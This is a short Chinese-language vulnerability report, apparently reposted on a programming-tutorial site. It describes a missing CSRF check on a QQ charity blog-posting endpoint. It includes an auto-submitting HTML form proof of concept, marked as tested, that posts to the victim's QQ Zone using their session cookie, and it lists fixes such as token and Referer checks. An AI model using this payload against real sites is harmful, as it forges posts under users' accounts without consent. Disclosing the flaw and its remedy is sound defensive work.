好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

QQ公益未做认证导致CSRF蠕虫 - 网站安全 - 自学p

QQ公益未做认证导致CSRF蠕虫

http://npoapp.gongyi.qq.com/blog/add 未做认证导致CSRF蠕虫 只要存有QQ空间的Cookie就可以提交blog发表到QQ空间。

<form id="Test" name="Test" action="http://npoapp.gongyi.qq.com/blog/add" method="POST"> <input type="text" name="content" value="test" /> <input type="text" name="title" value="Test" /> <input type="submit" value="submit" /> </form> <script> document.Test.submit(); </script>

测试有效

修复方案:

1、 验证HTTP Referer字段 2、在请求地址中添加token并验证 3、在HTTP头中自定义属性并验证

查看更多关于QQ公益未做认证导致CSRF蠕虫 - 网站安全 - 自学p的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15523
  阅读:79次

上一篇: 易名中国论坛XSS漏洞可无限刷玉米 - 网站安全

下一篇:百度产品论坛任务系统刷积分漏洞(可兑换礼品

相关资讯